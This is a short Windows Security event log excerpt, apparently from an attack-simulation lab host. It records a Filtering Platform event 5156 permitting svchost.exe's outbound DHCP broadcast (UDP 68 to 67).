Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:28:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887344
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 70370
Layer Name: Connect
Layer Run-Time ID: 48